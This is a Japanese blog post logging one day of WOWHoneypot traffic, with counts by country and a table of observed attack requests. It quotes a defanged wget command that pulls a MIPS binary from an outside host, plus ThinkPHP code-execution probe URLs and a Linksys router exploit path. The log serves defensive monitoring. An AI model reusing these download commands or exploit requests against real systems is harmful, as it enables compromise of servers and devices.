WOWHoneypot観察(165日目)
2019/08/28(木)
トータルは4197件でした。
ハンティングログは以下です。
| 68.226.71[.]32 wget+hxxp[:]//185.172.110[.]237/mipsel |
IPのロケーション別の件数は以下です。
| イタリア | 4003 |
| スイス | 90 |
| ブラジル | 41 |
| アメリカ | 26 |
| 中国 | 8 |
| インド | 7 |
| スリランカ | 3 |
| イギリス | 2 |
| フランス | 2 |
| ウクライナ | 2 |
| ドイツ | 2 |
| トルコ | 2 |
| スペイン | 1 |
| ギリシャ | 1 |
| イラン | 1 |
| コロンビア | 1 |
| ロシア | 1 |
| オランダ | 1 |
| シンガポール | 1 |
| フィリピン | 1 |
| インドネシア | 1 |
| 件数 | 概要 | リクエスト |
|---|---|---|
| 4136 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
| 43 | アクセス | GET / |
| 2 | phpMyAdminの調査 | GET /admin-scripts.asp |
| 2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
| 1 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
| 1 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
| 1 | phpMyAdminの調査 | GET /phpmyadmin/index.php |
| 1 | NMAPによるスキャン | POST /sdk |
| 1 | NMAPによるスキャン | HEAD / |
| 1 | NMAPによるスキャン | GET /HNAP1 |
| 1 | NMAPによるスキャン | GET /evox/about |
| 1 | NMAPによるスキャン | GET /nmaplowercheck1566925447 |
| 1 | NMAPによるスキャン | GET /NmapUpperCheck1566925447 |
| 1 | NMAPによるスキャン | GET /Nmap/folder/check1566925447 |
| 1 | 調査 | GET /index.php |
| 1 | 不明 | GET /imgs/ms_check_license |
| 1 | 不明 | GET /dana-na/nc/nc_gina_ver.txt |
にほんブログ村